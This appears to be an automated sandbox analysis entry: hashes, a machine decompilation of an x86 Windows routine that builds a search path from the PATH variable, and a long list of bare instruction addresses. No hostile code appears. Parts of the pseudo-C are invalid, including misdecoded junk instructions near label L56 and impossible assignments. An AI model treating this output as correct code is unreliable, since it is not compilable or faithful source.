                                                                                      • Opcode ID: bc2ac14b7aebd7f60e1b90211154aba2bfe120711bcae08dd9224966c0e3bf77
                                                                                      • Instruction ID: 01f8646fd4c2f0db89dd4ec15dfde0e3ee25f1731a176d7123bada41d52aa694
                                                                                      • Opcode Fuzzy Hash: bc2ac14b7aebd7f60e1b90211154aba2bfe120711bcae08dd9224966c0e3bf77
                                                                                      • Instruction Fuzzy Hash: 5A515771A08345CFD721CF69C08092BFBF5BB8A600F55496EF68587349D730E940CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E017E2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v16;
                                                                                      				unsigned int _v24;
                                                                                      				void* _v28;
                                                                                      				signed int _v32;
                                                                                      				unsigned int _v36;
                                                                                      				void* _v37;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				signed int _v48;
                                                                                      				signed int _v52;
                                                                                      				signed int _v56;
                                                                                      				intOrPtr _v60;
                                                                                      				signed int _v64;
                                                                                      				signed int _v68;
                                                                                      				signed int _v72;
                                                                                      				signed int _v76;
                                                                                      				signed int _v80;
                                                                                      				signed int _t239;
                                                                                      				signed int _t243;
                                                                                      				signed int _t249;
                                                                                      				signed int _t251;
                                                                                      				intOrPtr _t253;
                                                                                      				signed int _t256;
                                                                                      				signed int _t263;
                                                                                      				signed int _t266;
                                                                                      				signed int _t274;
                                                                                      				signed int _t280;
                                                                                      				signed int _t282;
                                                                                      				void* _t284;
                                                                                      				void* _t285;
                                                                                      				signed int _t286;
                                                                                      				unsigned int _t289;
                                                                                      				signed int _t293;
                                                                                      				char* _t294;
                                                                                      				signed int _t295;
                                                                                      				signed int _t299;
                                                                                      				intOrPtr _t311;
                                                                                      				signed int _t320;
                                                                                      				signed int _t322;
                                                                                      				signed int _t323;
                                                                                      				signed int _t327;
                                                                                      				signed int _t328;
                                                                                      				signed int _t330;
                                                                                      				void* _t331;
                                                                                      				signed int _t332;
                                                                                      				signed int _t334;
                                                                                      				signed int _t337;
                                                                                      				void* _t338;
                                                                                      				void* _t340;
                                                                                      
                                                                                      				_t334 = _t337;
                                                                                      				_t338 = _t337 - 0x4c;
                                                                                      				_v8 =  *0x18ad360 ^ _t334;
                                                                                      				_push(__ebx);
                                                                                      				_push(__esi);
                                                                                      				_push(__edi);
                                                                                      				_t327 = 0x18ab2e8;
                                                                                      				_v56 = _a4;
                                                                                      				_v48 = __edx;
                                                                                      				_v60 = __ecx;
                                                                                      				_t289 = 0;
                                                                                      				_v80 = 0;
                                                                                      				asm("movsd");
                                                                                      				_v64 = 0;
                                                                                      				_v76 = 0;
                                                                                      				_v72 = 0;
                                                                                      				asm("movsd");
                                                                                      				_v44 = 0;
                                                                                      				_v52 = 0;
                                                                                      				_v68 = 0;
                                                                                      				asm("movsd");
                                                                                      				_v32 = 0;
                                                                                      				_v36 = 0;
                                                                                      				asm("movsd");
                                                                                      				_v16 = 0;
                                                                                      				_t340 = (_v24 >> 0x0000001c & 0x00000003) - 1;
                                                                                      				_t280 = 0x48;
                                                                                      				_t309 = 0 | _t340 == 0x00000000;
                                                                                      				_t320 = 0;
                                                                                      				_v37 = _t340 == 0;
                                                                                      				if(_v48 <= 0) {
                                                                                      					L16:
                                                                                      					_t45 = _t280 - 0x48; // 0x0
                                                                                      					__eflags = _t45 - 0xfffe;
                                                                                      					if(_t45 > 0xfffe) {
                                                                                      						_t328 = 0xc0000106;
                                                                                      						goto L32;
                                                                                      					} else {
                                                                                      						_t327 = L017D4620(_t289,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t280);
                                                                                      						_v52 = _t327;
                                                                                      						__eflags = _t327;
                                                                                      						if(_t327 == 0) {
                                                                                      							_t328 = 0xc0000017;
                                                                                      							goto L32;
                                                                                      						} else {
                                                                                      							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
                                                                                      							_t50 = _t327 + 0x48; // 0x48
                                                                                      							_t322 = _t50;
                                                                                      							_t309 = _v32;
                                                                                      							 *(_t327 + 0x3c) = _t280;
                                                                                      							_t282 = 0;
                                                                                      							 *((short*)(_t327 + 0x30)) = _v48;
                                                                                      							__eflags = _t309;
                                                                                      							if(_t309 != 0) {
                                                                                      								 *(_t327 + 0x18) = _t322;
                                                                                      								__eflags = _t309 - 0x18a8478;
                                                                                      								 *_t327 = ((0 | _t309 == 0x018a8478) - 0x00000001 & 0xfffffffb) + 7;
                                                                                      								E017FF3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
                                                                                      								_t309 = _v32;
                                                                                      								_t338 = _t338 + 0xc;
                                                                                      								_t282 = 1;
                                                                                      								__eflags = _a8;
                                                                                      								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
                                                                                      								if(_a8 != 0) {
                                                                                      									_t274 = E018439F2(_t322);
                                                                                      									_t309 = _v32;
                                                                                      									_t322 = _t274;
                                                                                      								}
                                                                                      							}
                                                                                      							_t293 = 0;
                                                                                      							_v16 = 0;
                                                                                      							__eflags = _v48;
                                                                                      							if(_v48 <= 0) {
                                                                                      								L31:
                                                                                      								_t328 = _v68;
                                                                                      								__eflags = 0;
                                                                                      								 *((short*)(_t322 - 2)) = 0;
                                                                                      								goto L32;
                                                                                      							} else {
                                                                                      								_t280 = _t327 + _t282 * 4;
                                                                                      								_v56 = _t280;
                                                                                      								do {
                                                                                      									__eflags = _t309;
                                                                                      									if(_t309 != 0) {
                                                                                      										_t239 =  *(_v60 + _t293 * 4);
                                                                                      										__eflags = _t239;
                                                                                      										if(_t239 == 0) {
                                                                                      											goto L30;
                                                                                      										} else {
                                                                                      											__eflags = _t239 == 5;
                                                                                      											if(_t239 == 5) {
                                                                                      												goto L30;
                                                                                      											} else {
                                                                                      												goto L22;
                                                                                      											}
                                                                                      										}
                                                                                      									} else {
                                                                                      										L22:
                                                                                      										 *_t280 =  *(_v60 + _t293 * 4);
                                                                                      										 *(_t280 + 0x18) = _t322;
                                                                                      										_t243 =  *(_v60 + _t293 * 4);
                                                                                      										__eflags = _t243 - 8;
                                                                                      										if(__eflags > 0) {
                                                                                      											goto L56;
                                                                                      										} else {
                                                                                      											switch( *((intOrPtr*)(_t243 * 4 +  &M017E2959))) {
                                                                                      												case 0:
                                                                                      													__ax =  *0x18a8488;
                                                                                      													__eflags = __ax;
                                                                                      													if(__ax == 0) {
                                                                                      														goto L29;
                                                                                      													} else {
                                                                                      														__ax & 0x0000ffff = E017FF3E0(__edi,  *0x18a848c, __ax & 0x0000ffff);
                                                                                      														__eax =  *0x18a8488 & 0x0000ffff;
                                                                                      														goto L26;
                                                                                      													}
                                                                                      													goto L118;
                                                                                      												case 1:
                                                                                      													L45:
                                                                                      													E017FF3E0(_t322, _v80, _v64);
                                                                                      													_t269 = _v64;
                                                                                      													goto L26;
                                                                                      												case 2:
                                                                                      													 *0x18a8480 & 0x0000ffff = E017FF3E0(__edi,  *0x18a8484,  *0x18a8480 & 0x0000ffff);
                                                                                      													__eax =  *0x18a8480 & 0x0000ffff;
                                                                                      													__eax = ( *0x18a8480 & 0x0000ffff) >> 1;
                                                                                      													__edi = __edi + __eax * 2;
                                                                                      													goto L28;
                                                                                      												case 3:
                                                                                      													__eax = _v44;
                                                                                      													__eflags = __eax;
                                                                                      													if(__eax == 0) {
                                                                                      														goto L29;
                                                                                      													} else {
                                                                                      														__esi = __eax + __eax;
                                                                                      														__eax = E017FF3E0(__edi, _v72, __esi);
                                                                                      														__edi = __edi + __esi;
                                                                                      														__esi = _v52;
                                                                                      														goto L27;
                                                                                      													}
                                                                                      													goto L118;
                                                                                      												case 4:
                                                                                      													_push(0x2e);
                                                                                      													_pop(__eax);
                                                                                      													 *(__esi + 0x44) = __edi;
                                                                                      													 *__edi = __ax;
                                                                                      													__edi = __edi + 4;
                                                                                      													_push(0x3b);
                                                                                      													_pop(__eax);
                                                                                      													 *(__edi - 2) = __ax;
                                                                                      													goto L29;
                                                                                      												case 5:
                                                                                      													__eflags = _v36;
                                                                                      													if(_v36 == 0) {
                                                                                      														goto L45;
                                                                                      													} else {
                                                                                      														E017FF3E0(_t322, _v76, _v36);
                                                                                      														_t269 = _v36;
                                                                                      													}
                                                                                      													L26:
                                                                                      													_t338 = _t338 + 0xc;
                                                                                      													_t322 = _t322 + (_t269 >> 1) * 2 + 2;
                                                                                      													__eflags = _t322;
                                                                                      													L27:
                                                                                      													_push(0x3b);
                                                                                      													_pop(_t271);
                                                                                      													 *((short*)(_t322 - 2)) = _t271;
                                                                                      													goto L28;
                                                                                      												case 6:
                                                                                      													__ebx =  *0x18a575c;
                                                                                      													__eflags = __ebx - 0x18a575c;
                                                                                      													if(__ebx != 0x18a575c) {
                                                                                      														_push(0x3b);
                                                                                      														_pop(__esi);
                                                                                      														do {
                                                                                      															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                                                                      															E017FF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                                                                      															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                                                                      															__edi = __edi + __eax * 2;
                                                                                      															__edi = __edi + 2;
                                                                                      															 *(__edi - 2) = __si;
                                                                                      															__ebx =  *__ebx;
                                                                                      															__eflags = __ebx - 0x18a575c;
                                                                                      														} while (__ebx != 0x18a575c);
                                                                                      														__esi = _v52;
                                                                                      														__ecx = _v16;
                                                                                      														__edx = _v32;
                                                                                      													}
                                                                                      													__ebx = _v56;
                                                                                      													goto L29;
                                                                                      												case 7:
                                                                                      													 *0x18a8478 & 0x0000ffff = E017FF3E0(__edi,  *0x18a847c,  *0x18a8478 & 0x0000ffff);
                                                                                      													__eax =  *0x18a8478 & 0x0000ffff;
                                                                                      													__eax = ( *0x18a8478 & 0x0000ffff) >> 1;
                                                                                      													__eflags = _a8;
                                                                                      													__edi = __edi + __eax * 2;
                                                                                      													if(_a8 != 0) {
                                                                                      														__ecx = __edi;
                                                                                      														__eax = E018439F2(__ecx);
                                                                                      														__edi = __eax;
                                                                                      													}
                                                                                      													goto L28;
                                                                                      												case 8:
                                                                                      													__eax = 0;
                                                                                      													 *(__edi - 2) = __ax;
                                                                                      													 *0x18a6e58 & 0x0000ffff = E017FF3E0(__edi,  *0x18a6e5c,  *0x18a6e58 & 0x0000ffff);
                                                                                      													 *(__esi + 0x38) = __edi;
                                                                                      													__eax =  *0x18a6e58 & 0x0000ffff;
                                                                                      													__eax = ( *0x18a6e58 & 0x0000ffff) >> 1;
                                                                                      													__edi = __edi + __eax * 2;
                                                                                      													__edi = __edi + 2;
                                                                                      													L28:
                                                                                      													_t293 = _v16;
                                                                                      													_t309 = _v32;
                                                                                      													L29:
                                                                                      													_t280 = _t280 + 4;
                                                                                      													__eflags = _t280;
                                                                                      													_v56 = _t280;
                                                                                      													goto L30;
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      									goto L118;
                                                                                      									L30:
                                                                                      									_t293 = _t293 + 1;
                                                                                      									_v16 = _t293;
                                                                                      									__eflags = _t293 - _v48;
                                                                                      								} while (_t293 < _v48);
                                                                                      								goto L31;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					while(1) {
                                                                                      						L1:
                                                                                      						_t243 =  *(_v60 + _t320 * 4);
                                                                                      						if(_t243 > 8) {
                                                                                      							break;
                                                                                      						}
                                                                                      						switch( *((intOrPtr*)(_t243 * 4 +  &M017E2935))) {
                                                                                      							case 0:
                                                                                      								__ax =  *0x18a8488;
                                                                                      								__eflags = __ax;
                                                                                      								if(__eflags != 0) {
                                                                                      									__eax = __ax & 0x0000ffff;
                                                                                      									__ebx = __ebx + 2;
                                                                                      									__eflags = __ebx;
                                                                                      									goto L53;
                                                                                      								}
                                                                                      								goto L14;
                                                                                      							case 1:
                                                                                      								L44:
                                                                                      								_t309 =  &_v64;
                                                                                      								_v80 = E017E2E3E(0,  &_v64);
                                                                                      								_t280 = _t280 + _v64 + 2;
                                                                                      								goto L13;
                                                                                      							case 2:
                                                                                      								__eax =  *0x18a8480 & 0x0000ffff;
                                                                                      								__ebx = __ebx + __eax;
                                                                                      								__eflags = __dl;
                                                                                      								if(__eflags != 0) {
                                                                                      									__eax = 0x18a8480;
                                                                                      									goto L90;
                                                                                      								}
                                                                                      								goto L14;
                                                                                      							case 3:
                                                                                      								__eax = E017CEEF0(0x18a79a0);
                                                                                      								__eax =  &_v44;
                                                                                      								_push(__eax);
                                                                                      								_push(0);
                                                                                      								_push(0);
                                                                                      								_push(4);
                                                                                      								_push(L"PATH");
                                                                                      								_push(0);
                                                                                      								L67();
                                                                                      								__esi = __eax;
                                                                                      								_v68 = __esi;
                                                                                      								__eflags = __esi - 0xc0000023;
                                                                                      								if(__esi != 0xc0000023) {
                                                                                      									L10:
                                                                                      									__eax = E017CEB70(__ecx, 0x18a79a0);
                                                                                      									__eflags = __esi - 0xc0000100;
                                                                                      									if(__eflags == 0) {
                                                                                      										_v44 = _v44 & 0x00000000;
                                                                                      										__eax = 0;
                                                                                      										_v68 = 0;
                                                                                      										goto L13;
                                                                                      									} else {
                                                                                      										__eflags = __esi;
                                                                                      										if(__esi < 0) {
                                                                                      											L32:
                                                                                      											_t217 = _v72;
                                                                                      											__eflags = _t217;
                                                                                      											if(_t217 != 0) {
                                                                                      												L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
                                                                                      											}
                                                                                      											_t218 = _v52;
                                                                                      											__eflags = _t218;
                                                                                      											if(_t218 != 0) {
                                                                                      												__eflags = _t328;
                                                                                      												if(_t328 < 0) {
                                                                                      													L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
                                                                                      													_t218 = 0;
                                                                                      												}
                                                                                      											}
                                                                                      											goto L36;
                                                                                      										} else {
                                                                                      											__eax = _v44;
                                                                                      											__ebx = __ebx + __eax * 2;
                                                                                      											__ebx = __ebx + 2;
                                                                                      											__eflags = __ebx;
                                                                                      											L13:
                                                                                      											_t289 = _v36;
                                                                                      											goto L14;
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eax = _v44;
                                                                                      									__ecx =  *0x18a7b9c; // 0x0
                                                                                      									_v44 + _v44 =  *[fs:0x30];
                                                                                      									__ecx = __ecx + 0x180000;
                                                                                      									__eax = L017D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                      									_v72 = __eax;
                                                                                      									__eflags = __eax;
                                                                                      									if(__eax == 0) {
                                                                                      										__eax = E017CEB70(__ecx, 0x18a79a0);
                                                                                      										__eax = _v52;
                                                                                      										L36:
                                                                                      										_pop(_t321);
                                                                                      										_pop(_t329);
                                                                                      										__eflags = _v8 ^ _t334;
                                                                                      										_pop(_t281);
                                                                                      										return E017FB640(_t218, _t281, _v8 ^ _t334, _t309, _t321, _t329);
                                                                                      									} else {
                                                                                      										__ecx =  &_v44;
                                                                                      										_push(__ecx);
                                                                                      										_push(_v44);
                                                                                      										_push(__eax);
                                                                                      										_push(4);
                                                                                      										_push(L"PATH");
                                                                                      										_push(0);
                                                                                      										L67();
                                                                                      										__esi = __eax;
                                                                                      										_v68 = __eax;
                                                                                      										goto L10;
                                                                                      									}
                                                                                      								}
                                                                                      								goto L118;
                                                                                      							case 4:
                                                                                      								__ebx = __ebx + 4;
                                                                                      								goto L14;
                                                                                      							case 5:
                                                                                      								_t276 = _v56;
                                                                                      								if(_v56 != 0) {
                                                                                      									_t309 =  &_v36;
                                                                                      									_t278 = E017E2E3E(_t276,  &_v36);
                                                                                      									_t289 = _v36;
                                                                                      									_v76 = _t278;
                                                                                      								}
                                                                                      								if(_t289 == 0) {
                                                                                      									goto L44;
                                                                                      								} else {
                                                                                      									_t280 = _t280 + 2 + _t289;
                                                                                      								}
                                                                                      								goto L14;
                                                                                      							case 6:
                                                                                      								__eax =  *0x18a5764 & 0x0000ffff;
                                                                                      								goto L53;
                                                                                      							case 7:
                                                                                      								__eax =  *0x18a8478 & 0x0000ffff;
                                                                                      								__ebx = __ebx + __eax;
                                                                                      								__eflags = _a8;
                                                                                      								if(_a8 != 0) {
                                                                                      									__ebx = __ebx + 0x16;
                                                                                      									__ebx = __ebx + __eax;
                                                                                      								}
                                                                                      								__eflags = __dl;
                                                                                      								if(__eflags != 0) {
                                                                                      									__eax = 0x18a8478;
                                                                                      									L90:
                                                                                      									_v32 = __eax;
                                                                                      								}
                                                                                      								goto L14;
                                                                                      							case 8:
                                                                                      								__eax =  *0x18a6e58 & 0x0000ffff;
                                                                                      								__eax = ( *0x18a6e58 & 0x0000ffff) + 2;
                                                                                      								L53:
                                                                                      								__ebx = __ebx + __eax;
                                                                                      								L14:
                                                                                      								_t320 = _t320 + 1;
                                                                                      								if(_t320 >= _v48) {
                                                                                      									goto L16;
                                                                                      								} else {
                                                                                      									_t309 = _v37;
                                                                                      									goto L1;
                                                                                      								}
                                                                                      								goto L118;
                                                                                      						}
                                                                                      					}
                                                                                      					L56:
                                                                                      					_t294 = 0x25;
                                                                                      					asm("int 0x29");
                                                                                      					asm("out 0x28, al");
                                                                                      					if(__eflags > 0) {
                                                                                      						asm("o16 sub [esi+0x1], bh");
                                                                                      					}
                                                                                      					_t105 = _t327 + 1;
                                                                                      					 *_t105 =  *(_t327 + 1) - _t280;
                                                                                      					__eflags =  *_t105;
                                                                                      					asm("loopne 0x29");
                                                                                      					if(__eflags > 0) {
                                                                                      						if (__eflags <= 0) goto L62;
                                                                                      					}
                                                                                      					if(__eflags > 0) {
                                                                                      						_t327 = _t327 + 1;
                                                                                      						__eflags = _t327;
                                                                                      					}
                                                                                      					 *(_t327 + 1) =  *(_t327 + 1) - _t280;
                                                                                      					_pop(_t284);
                                                                                      					 *_t294 =  *_t294 + 0x94;
                                                                                      					 *(_t327 + 1) =  *(_t327 + 1) - _t284;
                                                                                      					 *(_t327 + 1) =  *(_t327 + 1) - _t322;
                                                                                      					 *(_t243 + 0x1f017e26 ^ 0x0201825b) =  *(_t243 + 0x1f017e26 ^ 0x0201825b) - 0x7e;
                                                                                      					_t330 = _t327 + _t327;
                                                                                      					__eflags = _t330;
                                                                                      					asm("daa");
                                                                                      					if(_t330 > 0) {
                                                                                      						_push(ds);
                                                                                      					}
                                                                                      					 *((intOrPtr*)(_t330 + 1)) =  *((intOrPtr*)(_t330 + 1)) - _t284;
                                                                                      					_t331 = _t330 - 1;
                                                                                      					_t115 = _t331 + 1;
                                                                                      					 *_t115 =  *(_t331 + 1) - _t284;
                                                                                      					__eflags =  *_t115;
                                                                                      					asm("daa");
                                                                                      					if( *_t115 > 0) {
                                                                                      						asm("fcomp dword [ebx-0x7e]");
                                                                                      					}
                                                                                      					_pop(_t285);
                                                                                      					 *_t294 =  *_t294 + 0xb4;
                                                                                      					 *(_t331 + 1) =  *(_t331 + 1) - _t285;
                                                                                      					 *_t294 =  *_t294 + 0xcc;
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					asm("int3");
                                                                                      					_push(0x20);
                                                                                      					_push(0x188ff00);
                                                                                      					E0180D08C(_t285, _t322, _t331);
                                                                                      					_v44 =  *[fs:0x18];
                                                                                      					_t323 = 0;
                                                                                      					 *_a24 = 0;
                                                                                      					_t286 = _a12;
                                                                                      					__eflags = _t286;
                                                                                      					if(_t286 == 0) {
                                                                                      						_t249 = 0xc0000100;
                                                                                      					} else {
                                                                                      						_v8 = 0;
                                                                                      						_t332 = 0xc0000100;
                                                                                      						_v52 = 0xc0000100;
                                                                                      						_t251 = 4;
                                                                                      						while(1) {
                                                                                      							_v40 = _t251;
                                                                                      							__eflags = _t251;
                                                                                      							if(_t251 == 0) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t299 = _t251 * 0xc;
                                                                                      							_v48 = _t299;
                                                                                      							__eflags = _t286 -  *((intOrPtr*)(_t299 + 0x1791664));
                                                                                      							if(__eflags <= 0) {
                                                                                      								if(__eflags == 0) {
                                                                                      									_t266 = E017FE5C0(_a8,  *((intOrPtr*)(_t299 + 0x1791668)), _t286);
                                                                                      									_t338 = _t338 + 0xc;
                                                                                      									__eflags = _t266;
                                                                                      									if(__eflags == 0) {
                                                                                      										_t332 = E018351BE(_t286,  *((intOrPtr*)(_v48 + 0x179166c)), _a16, _t323, _t332, __eflags, _a20, _a24);
                                                                                      										_v52 = _t332;
                                                                                      										break;
                                                                                      									} else {
                                                                                      										_t251 = _v40;
                                                                                      										goto L72;
                                                                                      									}
                                                                                      									goto L80;
                                                                                      								} else {
                                                                                      									L72:
                                                                                      									_t251 = _t251 - 1;
                                                                                      									continue;
                                                                                      								}
                                                                                      							}
                                                                                      							break;
                                                                                      						}
                                                                                      						_v32 = _t332;
                                                                                      						__eflags = _t332;
                                                                                      						if(_t332 < 0) {
                                                                                      							__eflags = _t332 - 0xc0000100;
                                                                                      							if(_t332 == 0xc0000100) {
                                                                                      								_t295 = _a4;
                                                                                      								__eflags = _t295;
                                                                                      								if(_t295 != 0) {
                                                                                      									_v36 = _t295;
                                                                                      									__eflags =  *_t295 - _t323;
                                                                                      									if( *_t295 == _t323) {
                                                                                      										_t332 = 0xc0000100;
                                                                                      										goto L86;
                                                                                      									} else {
                                                                                      										_t311 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                      										_t253 =  *((intOrPtr*)(_t311 + 0x10));
                                                                                      										__eflags =  *((intOrPtr*)(_t253 + 0x48)) - _t295;
                                                                                      										if( *((intOrPtr*)(_t253 + 0x48)) == _t295) {
                                                                                      											__eflags =  *(_t311 + 0x1c);
                                                                                      											if( *(_t311 + 0x1c) == 0) {
                                                                                      												L116:
                                                                                      												_t332 = E017E2AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
                                                                                      												_v32 = _t332;
                                                                                      												__eflags = _t332 - 0xc0000100;
                                                                                      												if(_t332 != 0xc0000100) {
                                                                                      													goto L79;
                                                                                      												} else {
                                                                                      													_t323 = 1;
                                                                                      													_t295 = _v36;
                                                                                      													goto L85;
                                                                                      												}
                                                                                      											} else {
                                                                                      												_t256 = E017C6600( *(_t311 + 0x1c));
                                                                                      												__eflags = _t256;
                                                                                      												if(_t256 != 0) {
                                                                                      													goto L116;
                                                                                      												} else {
                                                                                      													_t295 = _a4;
                                                                                      													goto L85;
                                                                                      												}
                                                                                      											}
                                                                                      										} else {
                                                                                      											L85:
                                                                                      											_t332 = E017E2C50(_t295, _a8, _t286, _a16, _a20, _a24, _t323);
                                                                                      											L86:
                                                                                      											_v32 = _t332;
                                                                                      											goto L79;
                                                                                      										}
                                                                                      									}
                                                                                      									goto L118;
                                                                                      								} else {
                                                                                      									E017CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                      									_v8 = 1;
                                                                                      									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                      									_t332 = _a24;
                                                                                      									_t263 = E017E2AE4( &_v36, _a8, _t286, _a16, _a20, _t332);
                                                                                      									_v32 = _t263;
                                                                                      									__eflags = _t263 - 0xc0000100;
                                                                                      									if(_t263 == 0xc0000100) {
                                                                                      										_v32 = E017E2C50(_v36, _a8, _t286, _a16, _a20, _t332, 1);
                                                                                      									}
                                                                                      									_v8 = _t323;
                                                                                      									E017E2ACB();
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						L79:
                                                                                      						_v8 = 0xfffffffe;
                                                                                      						_t249 = _t332;
                                                                                      					}
                                                                                      					L80:
                                                                                      					return E0180D0D1(_t249);
                                                                                      				}
                                                                                      				L118:
                                                                                      			}
                                                                                      0x01825bca
                                                                                      0x01825bcd
                                                                                      0x00000000
                                                                                      0x01825bd3
                                                                                      0x00000000
                                                                                      0x01825bd3
                                                                                      0x01825bcd
                                                                                      0x017e273c
                                                                                      0x017e273c
                                                                                      0x017e2742
                                                                                      0x017e2747
                                                                                      0x017e274a
                                                                                      0x017e274d
                                                                                      0x017e2750
                                                                                      0x00000000
                                                                                      0x017e2756
                                                                                      0x017e2756
                                                                                      0x00000000
                                                                                      0x017e2902
                                                                                      0x017e2908
                                                                                      0x017e290b
                                                                                      0x00000000
                                                                                      0x017e2911
                                                                                      0x017e291c
                                                                                      0x017e2921
                                                                                      0x00000000
                                                                                      0x017e2921
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2880
                                                                                      0x017e2887
                                                                                      0x017e288c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2805
                                                                                      0x017e280a
                                                                                      0x017e2814
                                                                                      0x017e2816
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e281e
                                                                                      0x017e2821
                                                                                      0x017e2823
                                                                                      0x00000000
                                                                                      0x017e2829
                                                                                      0x017e2829
                                                                                      0x017e2831
                                                                                      0x017e283c
                                                                                      0x017e283e
                                                                                      0x00000000
                                                                                      0x017e283e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e284e
                                                                                      0x017e2850
                                                                                      0x017e2851
                                                                                      0x017e2854
                                                                                      0x017e2857
                                                                                      0x017e285a
                                                                                      0x017e285c
                                                                                      0x017e285d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e275d
                                                                                      0x017e2761
                                                                                      0x00000000
                                                                                      0x017e2767
                                                                                      0x017e276e
                                                                                      0x017e2773
                                                                                      0x017e2773
                                                                                      0x017e2776
                                                                                      0x017e2778
                                                                                      0x017e277e
                                                                                      0x017e277e
                                                                                      0x017e2781
                                                                                      0x017e2781
                                                                                      0x017e2783
                                                                                      0x017e2784
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01825bd8
                                                                                      0x01825bde
                                                                                      0x01825be4
                                                                                      0x01825be6
                                                                                      0x01825be8
                                                                                      0x01825be9
                                                                                      0x01825bee
                                                                                      0x01825bf8
                                                                                      0x01825bff
                                                                                      0x01825c01
                                                                                      0x01825c04
                                                                                      0x01825c07
                                                                                      0x01825c0b
                                                                                      0x01825c0d
                                                                                      0x01825c0d
                                                                                      0x01825c15
                                                                                      0x01825c18
                                                                                      0x01825c1b
                                                                                      0x01825c1b
                                                                                      0x01825c1e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e28c3
                                                                                      0x017e28c8
                                                                                      0x017e28d2
                                                                                      0x017e28d4
                                                                                      0x017e28d8
                                                                                      0x017e28db
                                                                                      0x01825c26
                                                                                      0x01825c28
                                                                                      0x01825c2d
                                                                                      0x01825c2d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x01825c34
                                                                                      0x01825c36
                                                                                      0x01825c49
                                                                                      0x01825c4e
                                                                                      0x01825c54
                                                                                      0x01825c5b
                                                                                      0x01825c5d
                                                                                      0x01825c60
                                                                                      0x017e2788
                                                                                      0x017e2788
                                                                                      0x017e278b
                                                                                      0x017e278e
                                                                                      0x017e278e
                                                                                      0x017e278e
                                                                                      0x017e2791
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2756
                                                                                      0x017e2750
                                                                                      0x00000000
                                                                                      0x017e2794
                                                                                      0x017e2794
                                                                                      0x017e2795
                                                                                      0x017e2798
                                                                                      0x017e2798
                                                                                      0x00000000
                                                                                      0x017e2734
                                                                                      0x017e272c
                                                                                      0x017e2700
                                                                                      0x017e25ef
                                                                                      0x017e25ef
                                                                                      0x017e25ef
                                                                                      0x017e25f2
                                                                                      0x017e25f8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e25fe
                                                                                      0x00000000
                                                                                      0x017e28e6
                                                                                      0x017e28ec
                                                                                      0x017e28ef
                                                                                      0x017e28f5
                                                                                      0x017e28f8
                                                                                      0x017e28f8
                                                                                      0x00000000
                                                                                      0x017e28f8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2866
                                                                                      0x017e2866
                                                                                      0x017e2876
                                                                                      0x017e2879
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e27e0
                                                                                      0x017e27e7
                                                                                      0x017e27e9
                                                                                      0x017e27eb
                                                                                      0x01825afd
                                                                                      0x00000000
                                                                                      0x01825afd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x017e2633
                                                                                      0x017e2638
                                                                                      0x017e263b
                                                                                      0x017e263c
                                                                                      0x017e263e
                                                                                      0x017e2640
                                                                                      0x017e2642
                                                                                      0x017e2647
                                                                                      0x017e2649
                                                                                      0x017e264e
                                                                                      0x017e2650
                                                                                      0x017e2653
                                                                                      0x017e2659
                                                                                      0x017e26a2
                                                                                      0x017e26a7
                                                                                      0x017e26ac
                                                                                      0x017e26b2
                                                                                      0x01825b11
                                                                                      0x01825b15
                                                                                      0x01825b17
                                                                                      0x00000000
                                                                                      0x017e26b8
                                                                                      0x017e26b8
                                                                                      0x017e26ba
                                                                                      0x017e27a6
                                                                                      0x017e27a6
                                                                                      0x017e27a9
                                                                                      0x017e27ab
                                                                                      0x017e27b9
                                                                                      0x017e27b9
                                                                                      0x017e27be
                                                                                      0x017e27c1
                                                                                      0x017e27c3
                                                                                      0x017e27c5
